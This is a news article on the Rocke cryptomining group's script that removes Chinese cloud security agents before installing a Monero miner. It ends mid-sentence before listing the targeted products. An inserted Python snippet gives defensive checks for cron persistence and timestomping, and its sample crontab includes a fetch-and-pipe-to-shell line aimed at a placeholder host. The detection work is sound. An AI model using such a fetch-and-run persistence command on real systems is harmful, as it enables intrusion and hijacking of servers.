A group of hackers that specializes in infecting servers with cryptocurrency mining software has started disabling security software agents used in cloud environments to evade detection. Known as Rocke in the security industry, the group has been active since at least April 2018 and is known for exploiting critical vulnerabilities in web application frameworks and servers like Apache Struts, Oracle WebLogic and Adobe ColdFusion.

Once inside a server, the attackers execute shell scripts that download and install Monero cryptocurrency mining malware for Linux or Windows, depending on the server’s operating system. Researchers from Palo Alto Networks have analyzed recent samples of Rocke’s Linux shell scripts, which are believed to be related to the Xbash malware developed by a different cybercrime group called Iron. Tool overlap between different groups is not unusual, especially since many attack tools are publicly available or are sold commercially in underground markets.

However, the analyzed Rocke samples have a new feature that hasn’t been observed in coin-mining attacks before: Before deploying the coinminer, the malicious script searches for five different cloud security protection and monitoring products and uninstalls them from servers.

“These products were developed by Tencent Cloud and Alibaba Cloud (Aliyun), the two leading cloud providers in China that are expanding their business globally,” the Palo Alto Networks researchers said in a report. “To the best of our knowledge, this is the first malware family that developed the unique capability to target and remove cloud security products. This also highlights a new challenge for products in the cloud workload protection platforms market defined by Gartner.”

Shut out coinminer competitors and kill the security tools

Rocke’s malicious shell script, known as a7, performs several tasks that lay the groundwork for the coin-mining operation. First, it sets up Linux cron jobs so that it persists across reboots. Then it searches for and kills other cryptocurrency mining processes and adds iptables (firewall) rules to block competing coinminers from running. Finally, it uninstalls agent-based cloud security products, and only then does it download its own coin-mining program, execute it, hide its process and modify the file’s timestamp so it can’t be easily found by incident responders.
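Two triage checks for the persistence and anti-forensics steps just described, written here as an added example rather than code from the article or the Palo Alto Networks report. It assumes a POSIX host, and the crontab text and URL are constructed placeholders, not indicators from the report.

```python
import os
import re
import tempfile
import time

# Constructed sample crontab: one benign entry and one entry that fetches a
# remote script and pipes it straight into a shell, the persistence pattern
# the dropper described above relies on. The URL is a placeholder.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/logrotate /etc/logrotate.conf
*/10 * * * * curl -fsSL http://example.invalid/a7 | sh
"""

_FETCH_AND_RUN = re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:ba)?sh\b")


def suspicious_cron_lines(cron_text):
    """Return crontab entries that download something and pipe it into a shell."""
    hits = []
    for line in cron_text.splitlines():
        entry = line.strip()
        if entry and not entry.startswith("#") and _FETCH_AND_RUN.search(entry):
            hits.append(entry)
    return hits


def looks_timestomped(path, slack_seconds=86400):
    """Flag a file whose mtime is far older than its inode change time (ctime).

    utime()/`touch -d` can backdate mtime, but a POSIX kernel bumps ctime at that
    moment, so a large gap is a lead. chmod, tar -p and package installs produce
    the same gap legitimately, so corroborate before acting on it.
    """
    st = os.stat(path)
    return (st.st_ctime - st.st_mtime) > slack_seconds


def demo_timestomp_check():
    """Create a fresh file and a backdated one; return (fresh, backdated) verdicts."""
    with tempfile.TemporaryDirectory() as tmp:
        fresh = os.path.join(tmp, "fresh")
        backdated = os.path.join(tmp, "backdated")
        for p in (fresh, backdated):
            with open(p, "w") as fh:
                fh.write("x")
        thirty_days_ago = time.time() - 30 * 86400
        os.utime(backdated, (thirty_days_ago, thirty_days_ago))  # atime, mtime
        return looks_timestomped(fresh), looks_timestomped(backdated)


if __name__ == "__main__":
    print(suspicious_cron_lines(SAMPLE_CRONTAB))
    print(demo_timestomp_check())
```

On a live host, feed `suspicious_cron_lines` the output of `crontab -l` and the files under `/etc/cron*`, and run `looks_timestomped` over recently created executables.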

The five security solutions targeted by the malware are:
